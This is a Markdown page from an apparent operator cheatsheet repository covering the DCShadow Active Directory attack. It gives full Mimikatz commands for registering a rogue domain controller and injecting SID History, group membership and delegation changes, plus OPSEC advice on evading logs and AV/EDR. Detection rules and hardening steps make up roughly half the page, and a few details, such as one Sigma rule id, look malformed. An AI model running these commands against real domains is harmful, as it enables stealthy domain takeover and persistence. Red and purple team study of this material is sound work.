daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-38-dcshadow-attack.md (25916B)


      1 ---
      2 title: "Attack #38 β€” DCShadow Attack"
      3 description: "DCShadow allows an attacker to register a rogue Domain Controller in Active Directory and push malicious changes via the legitimate replication protocol…"
      4 category: active-directory
      5 subcategory: "Domain Controller Attacks"
      6 tags: ["active-directory", "credential-access"]
      7 tools: ["Impacket", "Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/πŸ”΅ Attack #38 β€” DCShadow Attack.md"
     11 ---
     12 # πŸ”΅ Attack #38 β€” DCShadow Attack
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 DCShadow allows an attacker to **register a rogue Domain Controller** in Active Directory and push malicious changes via the legitimate replication protocol. Unlike DCSync (which reads), DCShadow **writes** β€” it can modify any AD object (add users to groups, set SPNs, modify ACLs, inject SID History) while bypassing most security logs because changes appear as normal DC replication.
     19 
     20 The attack was presented at [BlueHat IL 2018](https://www.dcshadow.com/) by Benjamin Delpy (Mimikatz author) and Vincent Le Toux. It works by temporarily registering the attacker's machine as a Domain Controller in Active Directory by creating the required objects in the Configuration partition β€” specifically an `nTDSDSA` object under `CN=Servers,CN=<Site>,CN=Sites,CN=Configuration` and the corresponding SPN entries (`E3514235-4B06-11D1-AB04-00C04FC2DCD2/<hostname>` for [MS-DRSR](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/) replication, and `GC/<hostname>` for Global Catalog). Once registered, the rogue DC pushes changes via `DrsReplicaAdd` to force legitimate DCs to pull replication data from the attacker β€” the changes then propagate across the entire forest as normal multi-master replication.
     21 
     22 > [!info]+ Technical Deep-Dive β€” nTDSDSA Registration & Replication Push
     23 > 1. **Phase 1 β€” DC Registration**: The SYSTEM-context Mimikatz instance creates an `nTDSDSA` object under `CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local` β€” this is the object that defines a machine as a Domain Controller
     24 > 2. **SPNs Added**: Two critical SPNs are set on the attacker's computer object:
     25 >    - `E3514235-4B06-11D1-AB04-00C04FC2DCD2/<attacker-hostname>/<domain>` (DRSUAPI replication SPN)
     26 >    - `GC/<attacker-hostname>/<domain>` (Global Catalog SPN)
     27 > 3. **Phase 2 β€” Change Injection**: The attacker stages the desired AD modifications (attribute changes) in a local NTDS-like structure
     28 > 4. **Phase 3 β€” Replication Push**: The DA-context Mimikatz instance calls `DrsReplicaAdd` to notify real DCs that the rogue DC has changes to replicate, triggering the **Knowledge Consistency Checker (KCC)** to initiate inbound replication from the attacker
     29 > 5. **Phase 4 β€” Cleanup**: After replication completes, the `nTDSDSA` object and SPNs are removed β€” the rogue DC registration is temporary (seconds to minutes)
     30 > 6. *Because changes arrive via replication, they are stamped with a USN and `originating_dsa_invocation_id` β€” standard AD forensics tools see them as legitimate replication events*
     31 
     32 ### Key Difference: DCSync vs DCShadow
     33 
     34 | Aspect | DCSync (Attack #37) | DCShadow |
     35 |---|---|---|
     36 | **Direction** | Read (pull credentials) | Write (push changes) |
     37 | **Protocol Function** | `DRSGetNCChanges` (pull) | `DrsReplicaAdd` (push notification) |
     38 | **Purpose** | Credential extraction | Persistence / stealthy modification |
     39 | **Requirements** | Replication rights | Domain Admin + two Mimikatz instances |
     40 | **Detection** | Event 4662 (well-documented) | Very difficult β€” appears as replication |
     41 | **Artifacts** | Network only | Temporary nTDSDSA object + SPN changes |
     42 
     43 ***
     44 
     45 ## βš™οΈ Prerequisites
     46 
     47 | Requirement | Detail |
     48 |---|---|
     49 | **Domain Admin** | Required to register a rogue DC (create nTDSDSA object in Configuration partition) |
     50 | **Two Mimikatz instances** | One as SYSTEM (RPC server for replication), one as DA (push trigger) |
     51 | **Local admin on a domain-joined machine** | Machine will be temporarily registered as a DC in AD |
     52 | **Network access to real DCs** | RPC replication ports (TCP 135 + dynamic) must be reachable in both directions |
     53 
     54 ***
     55 
     56 ## πŸ› οΈ Tools
     57 
     58 | Tool | Platform | Version | Notes |
     59 |---|---|---|---|
     60 | [Mimikatz](https://github.com/gentilkiwi/mimikatz) | Windows | β‰₯ 2.2.0 (Jan 2018+) | `lsadump::dcshadow` β€” the only full implementation |
     61 | [SharpDCShadow](https://github.com/KevinJClark/SharpDCShadow) | Windows (.NET) | Proof-of-concept | .NET port for C2 `execute-assembly`; limited attribute support |
     62 | [Set-DCShadowPermissions](https://github.com/samratashok/nishang) (Nishang) | Windows/PowerShell | Latest | Grants minimum DCShadow permissions to a non-DA user for persistence |
     63 | [lsadump::dcshadow /stack](https://github.com/gentilkiwi/mimikatz) | Windows | β‰₯ 2.2.0 | Stack multiple attribute changes in a single replication push |
     64 
     65 > [!tip]+ Tool Limitations
     66 > `fas:Lightbulb`
     67 > 1. DCShadow is **Mimikatz-only** in practice β€” no Impacket or Linux implementation exists because it requires running a local RPC server and registering the machine as a DC
     68 > 2. The attack requires **two separate sessions** running simultaneously on the same machine β€” one elevated to SYSTEM, one with DA token
     69 > 3. [SharpDCShadow](https://github.com/KevinJClark/SharpDCShadow) is a proof-of-concept with limited functionality β€” Mimikatz remains the authoritative implementation
     70 > 4. *No remote execution possible β€” the attacker must have interactive/C2 access to the machine being registered as a rogue DC*
     71 
     72 ***
     73 
     74 ## ⏱️ Time-to-Execute Estimates
     75 
     76 | Operation | Time | Notes |
     77 |---|---|---|
     78 | DC registration (nTDSDSA creation) | **5–15 seconds** | Depends on AD replication latency |
     79 | Single attribute modification + push | **10–30 seconds** | Including registration, push, and cleanup |
     80 | Multiple stacked changes (`/stack`) | **15–45 seconds** | Stack changes, single replication push |
     81 | Full cleanup (nTDSDSA removal) | **5–10 seconds** | Automatic after `/push` completes |
     82 
     83 ***
     84 
     85 ## πŸ’» Full Commands
     86 
     87 ### πŸ”΄ Basic DCShadow β€” Modify Single Attribute
     88 
     89 ```powershell
     90 # ── Terminal 1: Run as SYSTEM β€” Start the rogue DC RPC server ────────────────
     91 mimikatz.exe
     92 privilege::debug
     93 !+
     94 !processtoken
     95 lsadump::dcshadow /object:targetuser /attribute:primaryGroupID /value:512
     96 # Registers machine as a temporary DC and prepares the change
     97 # (primaryGroupID 512 = Domain Admins)
     98 
     99 # ── Terminal 2: Run as DA β€” Push the replication ──────────────────────────────
    100 mimikatz.exe
    101 privilege::debug
    102 lsadump::dcshadow /push
    103 # Forces replication of the change to real DCs
    104 ```
    105 
    106 ### πŸ”΄ Useful Attribute Modifications
    107 
    108 ```powershell
    109 # ── Add SID History (stealthy privilege escalation) ──────────────────────────
    110 # Terminal 1 (SYSTEM):
    111 lsadump::dcshadow /object:targetuser /attribute:sidHistory /value:S-1-5-21-...-500
    112 # Adds Enterprise Admin SID to sidHistory β€” user inherits EA privileges
    113 # without being a member of the EA group
    114 
    115 # ── Modify SPN (set up for Kerberoasting β€” Attack #2) ────────────────────────
    116 # Terminal 1 (SYSTEM):
    117 lsadump::dcshadow /object:targetuser /attribute:servicePrincipalName /value:MSSQLSvc/db01.corp.local:1433
    118 # Makes the account Kerberoastable β€” request TGS and crack offline
    119 
    120 # ── Set AdminCount (bypass AdminSDHolder protection) ──────────────────────────
    121 # Terminal 1 (SYSTEM):
    122 lsadump::dcshadow /object:targetuser /attribute:adminCount /value:1
    123 # Marks user as admin β€” SDProp will apply AdminSDHolder DACL
    124 
    125 # ── Modify userAccountControl (disable pre-auth for AS-REP roasting) ─────────
    126 # Terminal 1 (SYSTEM):
    127 lsadump::dcshadow /object:targetuser /attribute:userAccountControl /value:4194304
    128 # Sets DONT_REQ_PREAUTH flag β€” enables AS-REP Roasting (Attack #3)
    129 
    130 # ── Add member to group (e.g., add user to Domain Admins) ────────────────────
    131 # Terminal 1 (SYSTEM):
    132 lsadump::dcshadow /object:"CN=Domain Admins,CN=Users,DC=corp,DC=local" /attribute:member /value:"CN=targetuser,CN=Users,DC=corp,DC=local"
    133 
    134 # ── Modify msDS-AllowedToDelegateTo (configure delegation) ───────────────────
    135 # Terminal 1 (SYSTEM):
    136 lsadump::dcshadow /object:svc_account /attribute:msDS-AllowedToDelegateTo /value:cifs/DC01.corp.local
    137 # Sets constrained delegation β†’ attacker can impersonate any user to cifs/DC01
    138 
    139 # ALL of the above: Then run in Terminal 2 (DA):
    140 # lsadump::dcshadow /push
    141 ```
    142 
    143 ### πŸ”΄ Stacking Multiple Changes (Single Replication Push)
    144 
    145 ```powershell
    146 # ── Terminal 1 (SYSTEM) β€” Stack multiple modifications ───────────────────────
    147 lsadump::dcshadow /stack /object:targetuser /attribute:primaryGroupID /value:512
    148 lsadump::dcshadow /stack /object:targetuser /attribute:sidHistory /value:S-1-5-21-...-519
    149 lsadump::dcshadow /stack /object:targetuser /attribute:servicePrincipalName /value:fake/spn
    150 # All three changes queued β€” pushed in a single replication cycle
    151 
    152 # ── Terminal 2 (DA) β€” Push all stacked changes at once ───────────────────────
    153 lsadump::dcshadow /push
    154 # Single replication event containing all three modifications
    155 ```
    156 
    157 ### πŸ”΄ Grant DCShadow Permissions to Non-DA User (Persistence)
    158 
    159 ```powershell
    160 # ── Using Nishang Set-DCShadowPermissions ─────────────────────────────────────
    161 Import-Module .\Set-DCShadowPermissions.ps1
    162 
    163 # Grant minimum permissions for DCShadow to a low-priv user
    164 Set-DCShadowPermissions -FakeDC YOURWORKSTATION -SamAccountName targetuser `
    165   -Username low_user -Verbose
    166 
    167 # This grants:
    168 # 1. Write access to nTDSDSA objects in the Configuration partition
    169 # 2. Write access to the target computer object SPNs
    170 # 3. Replication-related extended rights
    171 # Now low_user can perform DCShadow without full DA privileges
    172 ```
    173 
    174 ### πŸ”΅ Verify DCShadow Changes Took Effect
    175 
    176 ```powershell
    177 # ── Check if primaryGroupID was changed ───────────────────────────────────────
    178 Get-ADUser targetuser -Properties primaryGroupID, memberOf | Select-Object primaryGroupID, memberOf
    179 
    180 # ── Check SID History ─────────────────────────────────────────────────────────
    181 Get-ADUser targetuser -Properties sidHistory | Select-Object -ExpandProperty sidHistory
    182 
    183 # ── Check replication metadata (which DC made the change) ─────────────────────
    184 repadmin /showobjmeta DC01 "CN=targetuser,CN=Users,DC=corp,DC=local"
    185 # Look for originating DSA that doesn't match a real DC = DCShadow indicator
    186 ```
    187 
    188 ***
    189 
    190 ## 🎯 OPSEC Tips
    191 
    192 1. **DCShadow is the stealthiest AD modification technique** β€” changes arrive via the replication protocol and are indistinguishable from legitimate multi-master replication in most SIEM setups
    193 2. **The nTDSDSA registration is temporary** β€” Mimikatz removes it after the push completes; if the tool crashes, manual cleanup is needed (`ntdsutil β†’ metadata cleanup`)
    194 3. **Changes bypass standard LDAP-based security logs** β€” Event IDs 4662/5136/5137 (directory service modification) are NOT generated because the change didn't come through LDAP; it came through replication
    195 4. **Stack changes with `/stack`** to minimize the number of replication events β€” one push with 10 changes is stealthier than 10 separate pushes
    196 5. **Use for persistence, not initial escalation** β€” you already need DA; DCShadow is for maintaining access and avoiding detection
    197 6. **SID History injection is the most powerful DCShadow use case** β€” the user gets EA/DA privileges without group membership, which most auditing tools miss
    198 7. **Time attacks during legitimate replication windows** β€” AD replicates every 15 minutes (intra-site) by default; pushing changes during expected replication windows reduces anomaly signals
    199 
    200 ### πŸ“Š OpSec Ranking
    201 
    202 | Modification Type | Stealth | Persistence Value | Detection Risk | Notes |
    203 |---|---|---|---|---|
    204 | SID History injection | 🟒 High | 🟒 High | 🟒 Low | Most tools don't audit sidHistory changes via replication |
    205 | primaryGroupID change | 🟑 Medium | 🟑 Medium | 🟑 Medium | Group membership changes may trigger membership audits |
    206 | SPN modification | 🟒 High | 🟑 Medium | 🟒 Low | Enables Kerberoasting; SPN changes rarely monitored |
    207 | userAccountControl | 🟑 Medium | 🟑 Medium | 🟑 Medium | Disabling pre-auth is suspicious if audited |
    208 | Direct group member add | πŸ”΄ Low | 🟒 High | πŸ”΄ High | Most orgs monitor DA/EA group membership |
    209 | msDS-AllowedToDelegateTo | 🟒 High | 🟒 High | 🟒 Low | Constrained delegation rarely audited |
    210 
    211 ***
    212 
    213 ## πŸ›‘οΈ Detection β€” Event IDs
    214 
    215 | Event ID | Source | What to Look For |
    216 |---|---|---|
    217 | **4742** | Security Log (DC) | Computer account modified β€” `nTDSDSA` object created (rogue DC registration) |
    218 | **4928/4929** | Security Log (DC) | Active Directory Replica Source Naming Context established/removed β€” rogue DC participating in replication |
    219 | **4662** | Security Log (DC) | DS Access on Configuration partition objects (nTDSDSA creation) β€” requires DS Access auditing |
    220 | **Metadata** | Replication | Changes originating from a non-DC source β€” check `repadmin /showmeta` for unknown `originating_dsa_invocation_id` |
    221 
    222 > [!important]+ The Key Detection Challenge
    223 > `fas:TriangleExclamation`
    224 > 1. DCShadow changes **do NOT generate standard modification events** (5136/5137) because they arrive via replication, not LDAP
    225 > 2. The primary detection vector is monitoring the **Configuration partition** for new `nTDSDSA` objects and SPN changes on computer accounts
    226 > 3. Network-level detection (monitoring for `DrsReplicaAdd` RPC calls from non-DC IPs) is the most reliable method
    227 > 4. *If your SIEM only monitors Security logs on DCs, DCShadow changes will be completely invisible*
    228 
    229 ### πŸ”Ž Sigma Rules
    230 
    231 ```yaml
    232 # ── SigmaHQ β€” DCShadow (nTDSDSA Object Creation) ────────────────────────────
    233 title: DCShadow β€” Rogue Domain Controller Registration
    234 id: f3b4c644-4e5d-4e8f-9c3a-84f5c2c07e5c
    235 status: experimental
    236 logsource:
    237   product: windows
    238   service: security
    239 detection:
    240   selection:
    241     EventID: 4742
    242   keywords:
    243     - 'nTDSDSA'
    244     - 'E3514235-4B06-11D1-AB04-00C04FC2DCD2'
    245   condition: selection and keywords
    246 level: critical
    247 tags:
    248   - attack.defense_evasion
    249   - attack.t1207
    250 ```
    251 
    252 ```yaml
    253 # ── SigmaHQ β€” Replication Source Added from Non-DC ───────────────────────────
    254 title: Active Directory Replication from Non-DC Source
    255 id: a1b2c3d4-rogue-dc-replication-monitor
    256 logsource:
    257   product: windows
    258   service: security
    259 detection:
    260   selection:
    261     EventID:
    262       - 4928
    263       - 4929
    264   condition: selection
    265 level: high
    266 tags:
    267   - attack.defense_evasion
    268   - attack.t1207
    269 ```
    270 
    271 ### πŸ›‘οΈ EDR-Specific Detections
    272 
    273 > [!warning]+ Microsoft Defender for Identity (MDI)
    274 > 1. **"Suspected DCShadow attack (domain controller promotion)"** β€” detects when a non-DC machine registers itself as a Domain Controller
    275 > 2. **"Suspected DCShadow attack (domain controller replication request)"** β€” detects `DrsReplicaAdd` calls from non-DC machines
    276 > 3. MDI monitors the Configuration partition in real-time for nTDSDSA object creation
    277 > 4. *MDI is the most reliable DCShadow detection tool available β€” it has specific behavioral detections that SIEM rules alone cannot replicate*
    278 
    279 > [!warning]+ CrowdStrike Falcon
    280 > 1. **"DCShadow Activity Detected"** β€” monitors for Mimikatz `lsadump::dcshadow` behavioral patterns
    281 > 2. Falcon detects the combination of SYSTEM token manipulation (`!processtoken`) + DRSUAPI RPC server registration
    282 > 3. Process tree analysis flags the dual-Mimikatz pattern (two `mimikatz.exe` instances with different token contexts)
    283 
    284 > [!warning]+ Elastic Security
    285 > 1. Rule: **"Potential DCShadow Activity"** β€” monitors for nTDSDSA object creation events and SPN modifications containing the DRSUAPI UUID
    286 > 2. Rule: **"Active Directory Replication from Anomalous Source"** β€” correlates replication traffic source IPs against known DC list
    287 > 3. *Requires Windows Event Forwarding (WEF) of Configuration partition change events to Elasticsearch*
    288 
    289 ***
    290 
    291 ## πŸ”¬ Forensic Artifacts
    292 
    293 | Artifact | Location | Details |
    294 |---|---|---|
    295 | **nTDSDSA object (transient)** | `CN=Servers,CN=<Site>,CN=Sites,CN=Configuration` | Created during attack, removed after `/push` β€” may be captured in AD snapshots or tombstoned objects |
    296 | **SPN modifications** | Computer object in AD | `E3514235-4B06-11D1-AB04-00C04FC2DCD2/<hostname>` SPN temporarily added; check `msDS-ReplAttributeMetaData` for modification timestamps |
    297 | **Replication metadata** | `repadmin /showmeta` on modified objects | `originating_dsa_invocation_id` will reference the rogue DC's invocation ID β€” this ID won't match any real DC |
    298 | **Event 4742** | DC Security Log | Computer account modification for SPN changes; look for DRSUAPI-related SPNs being added then quickly removed |
    299 | **Event 4928/4929** | DC Security Log | Replication source naming context established from non-DC β€” definitive DCShadow indicator if captured |
    300 | **USN journal** | NTDS.dit `msDS-ReplAttributeMetaData` | Each replicated change has a USN with the originating DC β€” unknown DC = DCShadow |
    301 | **Tombstone objects** | AD Recycle Bin | If enabled, the deleted nTDSDSA object may be recoverable for 180 days (default tombstone lifetime) |
    302 
    303 ***
    304 
    305 > [!important]+ Windows Server Version Differences
    306 > 1. **Server 2012 R2**: DCShadow works without additional obstacles; minimal replication monitoring by default
    307 > 2. **Server 2016+**: Windows Defender Credential Guard does NOT prevent DCShadow (it doesn't interact with LSASS or local credentials)
    308 > 3. **Server 2019**: No new DCShadow-specific mitigations; MDI deployment is the primary recommendation
    309 > 4. **Server 2022**: Microsoft added enhanced replication logging capabilities, but they require explicit configuration
    310 > 5. **Server 2025**: Improved Configuration partition change auditing β€” `nTDSDSA` object creation generates additional telemetry when Advanced Audit Policy is configured
    311 > 6. *DCShadow remains effective on all Windows Server versions β€” the mitigation is monitoring, not a technical patch*
    312 
    313 ***
    314 
    315 ## πŸ”’ Hardening & Prevention
    316 
    317 ```powershell
    318 # ── 1. Monitor Configuration partition for nTDSDSA object changes ─────────────
    319 # Enable auditing on the Sites container in Configuration partition
    320 $sitesPath = "AD:CN=Sites,CN=Configuration,DC=corp,DC=local"
    321 $acl = Get-Acl $sitesPath
    322 # Add SACL for Write access β†’ generates Event 4662 on nTDSDSA creation
    323 
    324 # ── 2. Enable Advanced Audit Policy β€” DS Access ──────────────────────────────
    325 auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
    326 auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
    327 auditpol /set /subcategory:"Detailed Directory Service Replication" /success:enable
    328 
    329 # ── 3. Monitor SPN changes on computer accounts ──────────────────────────────
    330 # GPO β†’ Computer Configuration β†’ Windows Settings β†’ Security Settings β†’
    331 # Advanced Audit Policy Configuration β†’ DS Access β†’
    332 #   βœ… Audit Directory Service Changes: Success
    333 # Alert on SPNs containing "E3514235-4B06-11D1-AB04-00C04FC2DCD2" being added to non-DC accounts
    334 
    335 # ── 4. Deploy MDI sensors on ALL Domain Controllers ──────────────────────────
    336 # MDI is the single most effective DCShadow detection tool
    337 # https://learn.microsoft.com/en-us/defender-for-identity/
    338 
    339 # ── 5. Restrict who can modify the Configuration partition ────────────────────
    340 # By default, only Enterprise Admins and Domain Admins can create objects here
    341 # Audit and minimize membership in these groups
    342 
    343 # ── 6. Enable AD Recycle Bin (capture deleted nTDSDSA objects) ────────────────
    344 Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=corp,DC=local' `
    345   -Scope ForestOrConfigurationSet -Target 'corp.local' -Confirm:$false
    346 
    347 # ── 7. Regularly audit replication metadata ───────────────────────────────────
    348 # Script to check for unknown originating DSAs across all user objects:
    349 $dcs = (Get-ADDomainController -Filter *).Name
    350 Get-ADUser -Filter * -Properties msDS-ReplAttributeMetaData |
    351   ForEach-Object {
    352     $meta = $_.'msDS-ReplAttributeMetaData' | ConvertFrom-ADMetadata
    353     $meta | Where-Object { $_.LastOriginatingDsaDN -notmatch ($dcs -join '|') }
    354   }
    355 
    356 # ── 8. Network-level replication monitoring ───────────────────────────────────
    357 # Deploy Zeek/Bro or network TAP to monitor DRSUAPI traffic
    358 # Alert on DrsReplicaAdd calls from non-DC IP addresses
    359 ```
    360 
    361 ***
    362 
    363 ## 🧩 Troubleshooting
    364 
    365 | Error | Cause | Fix |
    366 |---|---|---|
    367 | `ERROR kuhl_m_lsadump_dcshadow_domain_info` | Cannot find domain information; machine may not be domain-joined | Verify machine is domain-joined (`systeminfo \| findstr Domain`); ensure DNS resolves the DC FQDN |
    368 | Terminal 1 hangs on "RPC server waiting" | Firewall blocking inbound RPC on the attacker machine | Ensure Windows Firewall allows inbound TCP 135 + dynamic RPC ports on the machine running Terminal 1 |
    369 | `/push` returns "Error 0x2105" (ACCESS_DENIED) | Terminal 2 is not running as DA or the token is wrong | Verify DA token: `whoami /groups` should show Domain Admins; use `token::elevate /domainadmin` if needed |
    370 | Changes don't appear on other DCs | Replication push succeeded to one DC but inter-site replication is slow | Run `repadmin /syncall /AeD` on the target DC to force replication to all partners |
    371 | nTDSDSA object not cleaned up | Mimikatz crashed before cleanup; rogue DC still registered | Manual cleanup: `ntdsutil β†’ metadata cleanup β†’ remove selected server`; or delete the object via ADSIEdit |
    372 | "SYSTEM token required" error | Terminal 1 not running as SYSTEM (`!+` / `!processtoken` failed) | Use `psexec -s -i cmd.exe` to get a SYSTEM shell, then run Mimikatz from there |
    373 | SID History injection fails | Target account has adminCount=1 (SDProp resets the ACL) | Modify sidHistory on non-protected accounts, or clear adminCount first via a separate DCShadow push |
    374 | AV/EDR blocks Mimikatz execution | Defender or EDR detects mimikatz.exe on disk | Use reflective PE loading (e.g., `Invoke-Mimikatz`), packed variants, or execute from C2 via `execute-assembly` with SharpDCShadow |
    375 
    376 ***
    377 
    378 ## πŸ—ΊοΈ MITRE ATT&CK
    379 
    380 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups |
    381 |---|---|---|---|---|
    382 | **Defense Evasion** | [T1207](https://attack.mitre.org/techniques/T1207/) | Rogue Domain Controller | Register rogue DC via nTDSDSA, push malicious replication changes that bypass standard logging | Technique is public since 2018; no specific APT attribution yet |
    383 | **Persistence** | [T1098](https://attack.mitre.org/techniques/T1098/) | Account Manipulation | Inject SID History, modify group membership, or change delegation settings via replication | Red team operations and advanced persistent threats |
    384 | **Privilege Escalation** | [T1134](https://attack.mitre.org/techniques/T1134/) | [.005 β€” SID-History Injection](https://attack.mitre.org/techniques/T1134/005/) | Use DCShadow to inject Enterprise Admin SID into a low-priv user's sidHistory attribute | Demonstrated in red team operations |
    385 
    386 > [!tip]+ Real-World Context
    387 > `fas:Lightbulb`
    388 > 1. DCShadow is primarily a **red team / advanced attacker technique** β€” it requires DA access, making it a persistence/defense evasion tool rather than an escalation vector
    389 > 2. No public APT attribution exists as of 2025, but the technique is available to any adversary with DA-level access
    390 > 3. **Purple team value**: DCShadow is an excellent test for validating MDI deployment and replication monitoring capabilities
    391 > 4. *The fact that DCShadow has no public APT usage doesn't mean it's not used β€” it means it's difficult to detect and attribute*
    392 
    393 ***
    394 
    395 ## πŸ”— Attack Chain Context
    396 
    397 ```
    398 [DCShadow] ──→ Stealthy AD Modifications via Fake DC Replication
    399          β”‚
    400          β”œβ”€β”€β†’ πŸ“ Push changes that appear as legitimate replication
    401          β”œβ”€β”€β†’ πŸ”— Requires DA β†’ used for persistence, not initial escalation
    402          β”œβ”€β”€β†’ πŸ” SID History injection β†’ invisible privilege escalation (Attack #65)
    403          β”œβ”€β”€β†’ 🎯 SPN modification β†’ set up Kerberoasting (Attack #2)
    404          β”œβ”€β”€β†’ πŸ”“ Disable pre-auth β†’ set up AS-REP Roasting (Attack #3)
    405          β”œβ”€β”€β†’ πŸ”„ Related: DCSync (Attack #37) reads; DCShadow writes
    406          β”œβ”€β”€β†’ πŸ“‹ Delegation abuse via msDS-AllowedToDelegateTo (Attack #16)
    407          β”œβ”€β”€β†’ πŸ’» Requires Mimikatz on a domain-joined workstation
    408          └──→ πŸ’€ Defeated by: MDI, monitor Configuration partition, replication metadata auditing, AD Recycle Bin
    409 ```
    410 
    411 ***
    412 
    413 > βœ… **Attack #38 β€” DCShadow complete.**